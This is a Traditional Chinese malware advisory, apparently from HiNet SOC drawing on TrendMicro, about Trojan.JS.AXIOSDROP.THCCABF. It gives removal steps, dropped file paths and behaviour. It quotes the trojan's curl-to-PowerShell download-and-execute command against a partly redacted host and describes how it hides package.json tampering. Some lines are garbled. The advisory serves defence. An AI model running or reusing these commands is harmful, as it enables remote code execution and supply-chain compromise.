| 風險等級: |
低度威脅 |
| 摘 要: |
病毒通告:Trojan.JS.AXIOSDROP.THCCABF 病毒 |
| 解決辦法: |
為防止系統受到該木馬的影響,建議使用者:?
清除建議步驟:
步驟 1
在進行任何掃描之前,Windows 7、Windows 8、Windows 8.1 和 Windows 10 使用者必須停用系統還原。在新分頁中開啟允許對他們的電腦進行全面掃描。
步驟 2
請注意,並非所有檔案、資料夾、登錄項目和登錄項目都會在此惡意軟體/間諜軟體/灰色軟體執行期間安裝到您的電腦上。這可能是由於安裝不完整或其他作業系統因素造成的。如果您找不到相同的文件/資料夾/註冊表信息,請繼續下一步。
步驟 3
尋找並刪除這些文件
可能存在一些隱藏檔案。請務必在「更多進階選項」中勾選「搜尋隱藏檔案和資料夾」複選框,以便將所有隱藏檔案和資料夾都包含在搜尋結果中。
%ProgramData%\wt.exe
%User Temp%\6202033.vbs
%User Temp%\6202033.ps1
刪除惡意軟體/灰色軟體檔案:
第四步
使用您的防毒程式掃描您的計電腦,刪除偵測到的 Trojan.JS.AXIOSDROP.THCCABF 檔案。如果您的防毒程式已清理、刪除或隔離了已偵測到的文件,則無需執行其他步驟。您可以選擇直接刪除隔離的檔案。 |
| 細節描述: |
該木馬程式以其他惡意軟體投放的檔案形式進入系統,或以使用者在造訪惡意網站時不知不覺下載的檔案形式進入系統。
安裝(Installation)
此木馬會釋放(建立)以下檔案:
%User Temp%\6202033.vbs - VBScript 中間放置器(Windows)
%UserTemp%\6202033.ps1 - PowerShell 腳本有效載荷(Windows)
%ProgramData%\wt.exe - PowerShell.exe 的副本(Windows)
/Library/Caches/com.apple.act.mond - 偽裝成 Apple 快取守護程式的二進位有效載荷 (macOS)
/tmp/ld.py - Python 腳本有效載荷(Linux)
(附註:%User Temp%是目前使用者的暫存資料夾,在 Windows 2000(32 位元)、XP 和 Server 2003(32 位元)系統中通常位於 C:\Documents and Settings\{使用者名稱}\Local Settings\Temp,在 Windows Vista、7、8、8.1、2008(64 位元)中位於1064 位元中(6464) C:\Users\{使用者名稱}\AppData\Local\Temp。%ProgramData%是 Program Files 資料夾的子資料夾,多用戶電腦上的任何使用者都可以在此資料夾中修改程式。系統中通常位於 C:\Documents and Settings\All Users。 )
程序行為(Processes)
如果運行在 Windows 系統上:
其中 PowerShell
cscript "%User Temp%\6202033.vbs" /nologo && del "%User Temp%\6202033.vbs" /f
cmd.exe /c curl -s -X POST -d "packages.{BLOCKED}m.org/product1" "http://{BLOCKED}k.com:8000/6202033" > "%User Temp%\6202033.ps1" & "%PROGpass -Userwid Temp%\6202033.ps1" "http://{BLOCKED}k.com:8000/6202033" & del "%User Temp%\6202033.ps1" /f
下載行為(Download Routine)
此木馬程式會連接到以下URL以下載其元件檔:
http://{BLOCKED}k.com:8000/
http://{BLOCKED}k.com:8000/6202033
其他細節(Other Details)
這個木馬程式會執行以下操作:
它會偵測主機作業系統,以選擇合適的有效載荷交付機制。
執行完畢後,它會自行刪除,以移除初始投放器。
執行完畢後,它會刪除VBScript中間檔案(Windows)。
執行完畢後,它會刪除下載的 PowerShell 腳本(Windows 系統)。
執行完畢後,它會刪除 AppleScript 檔案(macOS)。
它會在執行過程中篡改 npm 套件檔案:將原始的 package.json 檔案備份為 package.md 文件,然後在執行完畢後恢復它,以掩蓋篡改痕跡
HiNet SOC 建議使用者不定期更新病毒碼,以降低受駭風險。
https://hisecure.hinet.net/secureinfo/hotnews.php
|
| 參考資訊: |
TrendMicro
|
| |
